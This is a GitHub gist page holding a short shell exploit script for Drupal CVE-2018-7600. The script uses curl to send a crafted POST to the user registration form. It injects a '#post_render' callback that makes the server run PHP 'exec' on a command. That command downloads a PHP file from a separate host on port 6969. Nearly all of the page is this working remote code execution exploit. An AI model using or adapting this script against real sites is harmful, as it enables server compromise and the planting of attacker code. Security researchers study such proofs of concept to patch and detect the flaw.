Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Drupal CVE-2018-7600 PoC
#!/bin/sh
# https://github.com/a2u/CVE-2018-7600/issues/2
HOST="http://drupal.docker.localhost:8000"
PHP_FUNCTION="exec"
PHP_ARG="wget http://172.16.30.108:6969/foob.php"
curl -X POST \
"$HOST/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" \
-F form_id=user_register_form \
-F _drupal_ajax=1 \
-F "mail[#post_render][]=$PHP_FUNCTION" \
-F 'mail[#type]=markup' \
-F "mail[#markup]=$PHP_ARG"
@AlbinoDrought

This comment has been minimized.

Show comment Hide comment
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment